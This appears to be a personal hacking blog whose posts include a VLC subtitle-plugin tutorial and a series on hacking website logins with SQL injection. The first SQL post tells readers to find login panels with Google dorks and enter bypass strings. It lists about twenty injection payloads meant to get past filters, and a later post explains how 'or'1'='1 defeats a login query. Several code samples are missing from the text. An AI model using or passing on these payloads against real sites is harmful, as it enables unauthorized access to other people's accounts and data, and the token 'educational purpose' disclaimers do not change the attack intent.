6 Jul 2016

Download subtitle while watching video on your Desktop / Laptop using VLC

Hi Folks,

VLC is a great free media player to watch videos / Movies on your laptop / computer.
However, sometimes its difficult to stay in touch with the story if the video is poor, accent used by the actors is a bit different than what we are actually used to. Also, sometimes when you find your favorite movie / TV series in different language than your regional, subtitles are your only option.

In this article, we'll cover how you can download the subtitles directly from your VLC media player.
Here, we'll be using a popular VLC extension called VLSub.

Method 1:
1. Download the plugin from here.
2. Extract the zip file and look for "vlsub.lua" file. We need to move this file, do VLC pluing folder.
3. Assuming you've installed VLC to the default location of your OS:
For Linux:
Simply use below command from your terminal

cp vlsub.lua /usr/lib/vlc/lua/extensions/

For Windows:
Copy the file to below location:


4. Start VLC player. Go to View >  VLCSub
5. In the visible window, you can search the subtitles either by using Hash or by Name.
6. Select the subtitle from the list and its done. subtitles will be added to your video automatically.

Method 2:
If you're using the latest version of VLC, then you don't even need to go with any other plugin.
Download subtitle option is already integrated.
So now you can enjoy your favorite video with the subtitles.

Stay tuned ;)

5 Jul 2016

A note of Apology & Thanks to all the blog readers

Hi Folks,

Hope you all are doing great.

I've been inactive for quite a long time, as I was stuck in kind of messy corporate life which I never thought I'll join anytime soon.
I would like to thank, all my blog readers which are really appreciating / abusing (sometimes) :P my work and the articles over comments and emails.
Your feedback really means a lot to me.
I've become a really lousy writer recently, when I wrote the 3 article series on SQL Injection.
Even today when I read those articles, deep down in my heart I know they could've been a lot better.

I'm not gonna make a promise that in future I'll spend more time in blogging, or I'll do some more hacking tutorials, because...
I DON'T KNOW, where things are heading and how much focused I can be from here to the journey lies ahead.

I just want to say, THANK YOU all for your love, support and encouragement.

Keep Hacking. Keep Rocking :)

1 Mar 2015

Create your own SQL Injection string

Hi guys,

In this short article, I'm gonna cover how you can create our very own SQL injection string.
In last article , we already covered that how we can divide a simple SQL string into two parts and can manipulate the other part so that it can give desired output.
The second half of terminated string can be used in anyways, like

or something more.

With a basic knowledge of SQL sting, it will all start making sense.

Keep digging. Feel free to write me if you need any help. :)

8 Feb 2015

How SQL Injection works - part 2

hey guys,
first of all sorry for not posting anything for a long time. I've been very busy since last of couple of months. Err.. I know I didn't posted anything for even more longer :P

Note: This article is for educational purpose only. Hack The Dark will not be responsible for any misuse or any harm caused to any property or person or anything else.

Anyways, lets get started from where we left last time.

In the Last article, we learned how you can use SQL Injections to hack into vulnerable website. Some of you might be wondering how this SQL injection actually works.

So we are gonna cover the working on SQL and SQL injections inside the box. In order to move forward, I need to have basic knowledge of atleast. Now, if you want me to provide some links which you can add in your browsers bookmarks and never ever gonna open them back, then its not gonna happen. Hit google, and it will spit out some really good articles about SQL.

Now, lets get started.

Assuming, you are using latest version of mysql server (can use SQL server as well), first we will gonna create a simple table of users. Just copy the below query and run it in your sql wizard.

  `username` varchar(255) NOT NULL,
  `password` varchar(255) NOT NULL

Once table is created, lets insert few records in it. Use below SQL query to insert few records.

INSERT INTO `users` (`username`, `password`) VALUES
('admin', '123456'),
('administrator', 'hackthedark');

Since, we have a table with some records in it. So now if a user tries to login in application, the server side script will gonna fetch the records from login form and check the database with following query:

SELECT * FROM `users` WHERE username = '<USERNAME>' AND password = '<PASSWORD>';

If the supplied username and password combination found in the database then it will return the result else it will return a empty set of record. So far so good.
Since in last article I showed a simple SQL injection string i.e. 'or'1'='1
Here lets try to put this string in place of password in above SQL query and see what happens,

SELECT * FROM `users` WHERE username = '<USERNAME>' AND password = ''or'1'='1';

Lets run this query in SQL wizard now. ....Viola, It returns all the records. We successfully performed the SQL injection.

If we look closer the SQL query after injecting the SQL injection string, this is HOW it worked:

The OR part from our SQL inection string actually separated the WHERE clause of SQL query into two parts:
1st part:

SELECT * FROM `users` WHERE username = '<USERNAME>' AND password = ''

2nd part:


Here 1st part returned empty set while the 2nd part returned complete set, since both are the part of same query so we get a complete set of results and will successfully able to login into the website. :)

That's all for this article.
In the upcoming article we will learn how you can create your very own SQL injection strings and how to protect your website from SQL injection.

Till then, keep learning. keep rocking :)

28 Jul 2014

Hack Websites Using SQL Injection : Part 1

Hi Folks,

This is the first article from my four article series based on SQL injection.
In this article, we'll cover How to Hack the website login by using SQL injection.

Note: This article is for educational purpose only. Hack The Dark will not be responsible for any misuse or any harm caused to any property or person or anything else.

Warning: Unethical hacking to anyone's website is illegal and it may can put your ass behind the bars.

Alright, let go ahead
first, we need to find the admin login panel or whatever login panel you want to hack. If you have a basic knowledge of server based scripting then you can create a basic login page to test SQL injection.

You can use basic Google dorks to find the login panel:


Go the vulnerable link. You'll see the login panel asking for Email & Password.

You can put any random record in Username / Email field like administrator / admin@domain.com

For Password, you can use something like: ‘or’1′=’1
Hit login and you're done ;)

Some dumb head folks, put restrictions with specific SQL strings.
Find below the list of commonly used SQL injections:

‘ or 1=1 –
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”)

If you know the basic of SQL you can always create your own strings, which however I'll cover in future article of this series.

Keep Learning. Keep Rocking. :)

Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Online Project management